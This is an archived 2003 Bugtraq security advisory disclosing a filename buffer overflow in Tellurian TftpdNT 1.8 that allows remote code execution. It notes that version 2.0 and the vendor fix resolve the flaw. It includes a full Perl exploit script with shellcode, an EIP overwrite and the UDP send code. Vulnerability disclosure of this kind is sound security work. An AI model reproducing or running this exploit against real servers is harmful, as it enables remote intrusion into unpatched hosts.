lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200309011432.36872.aviram@beyondsecurity.com>
Date: Mon, 1 Sep 2003 14:32:36 +0300
From: Aviram Jenik <aviram@...ondsecurity.com>
To: bugtraq@...urityfocus.com
Subject: Security Vulnerability in Tellurian TftpdNT (Long Filename)


Security Vulnerability in Tellurian TftpdNT (Long Filename)
------------------------------------------------------------------------ 
 


Article reference: 
http://www.securiteam.com/windowsntfocus/5RP0M1PAUM.html
 
SUMMARY

Tellurian TftpdNT (http://www.tellurian.com.au/) is a TFTP server for Windows 
NT and Windows 9x. 
A buffer overflow vulnerability in the product allows remote attackers to 
cause the product to overflow an internal buffer, while executing arbitrary 
code. 


DETAILS

Vulnerable systems: 
  * TftpdNT version 1.8 
 
 Immune systems: 
  * TftpdNT version 2.0 
 
 It is possible to cause a buffer overflow in the Tellurian TftpdNT product, 
while overwriting the EIP pointer - this allows remote command execution. 
 The overflow occurs in the product's parsing of the filename. 
 
 Vendor status: 
 The vendor has been informed, and has fixed the issue within 24 hours. A new 
version is available on the web site. 
 
 Exploit: 
 #!/usr/bin/perl -w 
 #Tellurian TFTP Server buffer overflow vulnerability 
 
 use IO::Socket; 
 $host = "192.168.1.44"; 
 $port = "69"; 
 
 $shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\ 
 \xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\ 
 \xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\ 
 \x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F"; 
 
 $buf = "\x00\x02"; 
 $buf .= "\x41"x(508-length($shellcode)); 
 $buf .= $shellcode; 
 $buf .= "\x0F\x02\xC7"; # EIP 
 $buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00"; 
 
 print "Length: ", length($buf), "\n"; 
 
 $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: 
 $@\n"; 
 $ipaddr = inet_aton($host) || $host; 
 $portaddr = sockaddr_in($port, $ipaddr); 
 send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n"; 
 print "Done\n"; 
 



SecurITeam would like to thank STORM (storm@...uriteam.com) for finding this 
vulnerability. 

-- 
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com

Know that you're safe:
http://www.AutomatedScanning.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ